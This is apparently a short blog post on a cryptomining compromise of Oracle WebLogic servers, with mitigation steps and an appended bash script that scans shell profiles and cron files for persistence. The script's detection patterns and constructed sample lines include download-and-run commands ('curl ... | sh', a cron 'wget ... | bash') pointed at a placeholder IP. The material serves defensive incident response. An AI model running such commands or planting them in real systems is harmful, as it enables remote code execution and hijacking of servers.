HACKED: Oracle WebLogic Bitcoin/Blockchain Mining HACK Event

Apply the procedure below to mitigate the HACKING event!

M. Fevzi Korkutata
2 min read · Aug 20, 2024

If you have the script below in your bash profile and a suspicious cron job on your server, you have been HACKED: your Oracle WebLogic server has been hacked. That is why your server's CPU usage is high; bitcoin mining is consuming your server's CPUs.

Apply the procedure below to mitigate the HACKING event!

  1. Close and disable outbound internet access from your server.
  2. Close and disable inbound internet access to your WebLogic console and managed server ports.
  3. Disable WebLogic t3 protocol access.
  4. Apply the latest Oracle WebLogic patches.
  5. Apply the latest Java JDK update to your environment.
  6. Disable WebLogic console access from the internet permanently.
  7. Put a reverse proxy web server in front of the Oracle WebLogic HTTP ports.

[Figure: Oracle WebLogic mining HACK script]
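To check a server for the two indicators described above (a download-and-run line in a shell profile and a suspicious cron job), the following script is an added example, not the author's code. Its match patterns, file locations and sample lines are assumptions: generic heuristics and constructed test data, not strings taken from the script pictured.

```shell
#!/usr/bin/env bash
# Added example: flag download-and-run persistence in shell profiles and cron files.
# PATTERN is an assumed generic heuristic, not the text of the script pictured above.
PATTERN='(curl|wget)[^|;&]*\|[[:space:]]*(ba)?sh'
PATTERN="$PATTERN"'|base64[[:space:]]+(-d|--decode)[^|]*\|[[:space:]]*(ba)?sh|/dev/tcp/'

# scan_files FILE...: print "file:line:text" for every suspicious line.
# Returns 0 if anything was flagged, 1 if every readable file is clean.
scan_files() {
    local f rc=1
    for f in "$@"; do
        [ -f "$f" ] || continue
        [ -r "$f" ] || { echo "unreadable, rerun as root: $f" >&2; continue; }
        if grep -HnE -- "$PATTERN" "$f"; then rc=0; fi
    done
    return "$rc"
}

# count_hits FILE...: number of suspicious lines across the given files.
count_hits() { scan_files "$@" | wc -l | tr -d ' '; }

# scan_host [EXTRA_FILE...]: assumed default locations on a Linux host. Pass the
# profile of the account that runs WebLogic if its home is outside /home.
scan_host() {
    scan_files /root/.bash_profile /root/.bashrc /root/.profile \
        /home/*/.bash_profile /home/*/.bashrc /home/*/.profile \
        /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/* "$@"
}

# make_samples DIR: constructed sample files for a dry run (203.0.113.10 is a
# documentation address, not an indicator from the incident).
make_samples() {
    printf '%s\n' 'export PATH=$PATH:/u01/oracle/bin' \
        'curl -fsSL http://203.0.113.10/x.sh | sh' > "$1/bash_profile"
    printf '%s\n' '*/5 * * * * wget -q -O - http://203.0.113.10/x.sh | bash' > "$1/cron_oracle"
    printf '%s\n' '0 2 * * * /u01/scripts/rotate_logs.sh' > "$1/cron_clean"
}

# Usage: ./scan_persistence.sh --host [extra files]
if [ "${1:-}" = "--host" ]; then
    shift
    if scan_host "$@"; then echo "Suspicious entries found."; else echo "No matches."; fi
fi
```

A clean result only means these patterns did not match; a host with unexplained high CPU usage still warrants the full procedure above.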
